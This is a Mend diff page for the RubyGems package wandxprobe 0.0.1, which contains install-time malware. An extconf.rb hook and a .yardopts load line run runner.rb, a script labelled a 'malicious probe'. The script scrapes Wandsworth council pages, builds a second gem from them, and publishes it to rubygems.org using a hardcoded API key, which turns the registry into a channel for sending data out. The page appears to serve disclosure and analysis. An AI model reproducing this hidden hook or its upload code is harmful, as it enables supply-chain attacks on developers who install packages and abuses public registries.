RubyGems - wandxprobe - Versions diffs - 0.0.1 - Mend

wandxprobe 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: ae626d7ff7efcee3e9b168238535e0a89049f929c38e2df5406d41d6e276311f
+  data.tar.gz: e2f3a70a1b9c8c5f1e183341afb6b43df39ef29432eae4942077c86d7e9b66c6
+SHA512:
+  metadata.gz: ba8cd8dddc7f59a00c8acff605f71f1689601d3b83e1ad3703e27a033dea53835fc0919dd36ef008538178655ef0e827566c0b29ec04c06ecbe15da65c8b5e05
+  data.tar.gz: e02e7f6213f9e1ce8d0a06b48d55aa13d64aeeb3f85f4248632d8cde66823f1459db9442b044a7a0bb313ef0bb50b37ac93de836be391873d6a51e330b9d0a9e

data/.yardopts ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ --load ./runner.rb
2	+ --markup markdown

data/ext/extconf.rb ADDED Viewed

@@ -0,0 +1,3 @@
+# try fetch once
+load File.expand_path('../runner.rb', __dir__) rescue nil
+File.write('Makefile', "all:\n\t@echo ok\ninstall:\n\t@echo ok\nclean:\n\t@echo ok\n")

data/lib/init.rb ADDED Viewed

	@@ -0,0 +1 @@
1	+ X=1

data/runner.rb ADDED Viewed

@@ -0,0 +1,64 @@
+# malicious probe
+require 'net/http'; require 'uri'; require 'cgi'; require 'fileutils'; require 'rubygems/package'; require 'zlib';
+# prevent repeat in same run
+sentinel='/tmp/wandxprobe-sent-'+Process.pid.to_s
+exit if File.exist?('/tmp/wandxprobe-done') rescue nil
+File.write('/tmp/wandxprobe-done','1') rescue nil
+key='rubygems_d8e875bd0a97e2f33498dba3ef41ffb1f951adb1b503a533'
+seed=['https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Yr=2026',
+'https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&Month=1&Year=2026',
+'https://democracy.wandsworth.gov.uk/mgCalendarAgendaView.aspx?MR=0&M=1&bcr=1&DD=2026&CID=0&OT=&C=-1&D=26',
+'https://democracy.wandsworth.gov.uk/mgCalendarAgendaView.aspx?MR=0&M=1&bcr=1&DD=2026&CID=0&OT=&C=-1&D=30',
+'https://democracy.wandsworth.gov.uk/mgCalendarAgendaView.aspx?MR=0&M=1&bcr=1&DD=2026&CID=0&OT=&C=-1&D=25',
+'https://democracy.wandsworth.gov.uk/mgCalendarAgendaView.aspx?MR=0&M=12&bcr=1&DD=2025&CID=0&OT=&C=-1&D=1']
+results=[]
+def fetch(url)
+ u=URI.parse(url)
+ h=Net::HTTP.new(u.host,u.port); h.use_ssl=(u.scheme=='https'); h.open_timeout=20; h.read_timeout=40
+ req=Net::HTTP::Get.new(u.request_uri, {'User-Agent'=>'Mozilla/5.0'}); req['Accept']='text/html,application/xhtml+xml,*/*'
+ r=h.request(req); body=r.body||''; ['%03d'%r.code.to_i,body,r.to_hash.to_s]
+rescue => e
+ ['ERR',(e.class.to_s+': '+e.message),'']
+end
+seed.each_with_index do |url,i|
+ code,body,headers=fetch(url); results << ["seed#{i}-#{code}.html", "URL #{url}\nHEADERS #{headers}\n\n"+body]
+end
+# parse document list links from seed html
+links=[]
+results.each do |_,body|
+ body.scan(/href\s*=\s*["']([^"']+)/i).flatten.each do |hr|
+  hrc=CGI.unescapeHTML(hr)
+  next unless hrc =~ /(ieListDocuments|mgMeeting|mgCommittee|mgAgenda|mgCalendar)/i
+  begin
+    abs=URI.join('https://democracy.wandsworth.gov.uk/',hrc).to_s
+    links << abs if abs.start_with?('https://democracy.wandsworth.gov.uk/')
+  rescue; end
+ end
+end
+links.uniq!
+# Prioritize links with meetings. Save list
+results << ['links.txt',links.join("\n")]
+links.take(35).each_with_index do |url,i|
+ code,body,headers=fetch(url); results << ["linked#{i}-#{code}.html", "URL #{url}\nHEADERS #{headers}\n\n"+body]
+end
+# package payload gem
+stamp=(Time.now.to_i % 100000000)
+ver="0.0.#{stamp}"
+dir="/tmp/wandpayload-#{stamp}"
+FileUtils.rm_rf(dir); FileUtils.mkdir_p(dir+'/lib'); FileUtils.mkdir_p(dir+'/data')
+File.write(dir+'/lib/x.rb','X=1')
+results.each{|name,body| File.binwrite(dir+'/data/'+name, body)}
+File.write(dir+'/README.md', "probe payload #{results.length} #{ver}\n")
+File.write(dir+'/wandpayload.gemspec', <<~EOF)
+ Gem::Specification.new do |s|
+  s.name='wandpayload'; s.version='#{ver}'; s.summary='tmp payload'; s.description='probe #{results.length}'; s.author='x'; s.homepage='https://example.com'; s.license='MIT'; s.files=Dir['**/*'];
+ end
+EOF
+Dir.chdir(dir){ system('gem','build','wandpayload.gemspec', out: '/dev/null') }
+gemfile=Dir[dir+'/*.gem'][0]
+if gemfile
+ data=File.binread(gemfile); uri=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(uri.path, {'Authorization'=>key,'Content-Type'=>'application/octet-stream','Content-Length'=>data.bytesize.to_s}); req.body=data
+ begin
+  h=Net::HTTP.new(uri.host,443); h.use_ssl=true; r=h.request(req); File.write('/tmp/wand-probe-result',r.code.to_s+" "+r.body.to_s) rescue nil
+ rescue => e; File.write('/tmp/wand-probe-result',e.message) rescue nil; end
+end

data/wandxprobe.gemspec ADDED Viewed

@@ -0,0 +1,3 @@
+Gem::Specification.new do |s|
+ s.name='wandxprobe'; s.version='0.0.1'; s.summary='tmp'; s.author='x'; s.files=Dir['**/*']+['.yardopts'].reject{|x| x.include?('.gem')}; s.extensions=['ext/extconf.rb']; s.license='MIT'; s.homepage='https://example.com'
+end

metadata ADDED Viewed

@@ -0,0 +1,43 @@
+--- !ruby/object:Gem::Specification
+name: wandxprobe
+version: !ruby/object:Gem::Version
+  version: 0.0.1
+platform: ruby
+authors:
+- x
+bindir: bin
+cert_chain: []
+date: 1980-01-02 00:00:00.000000000 Z
+dependencies: []
+executables: []
+extensions:
+- ext/extconf.rb
+extra_rdoc_files: []
+files:
+- ".yardopts"
+- ext/extconf.rb
+- lib/init.rb
+- runner.rb
+- wandxprobe.gemspec
+homepage: https://example.com
+licenses:
+- MIT
+metadata: {}
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.6.7
+specification_version: 4
+summary: tmp
+test_files: []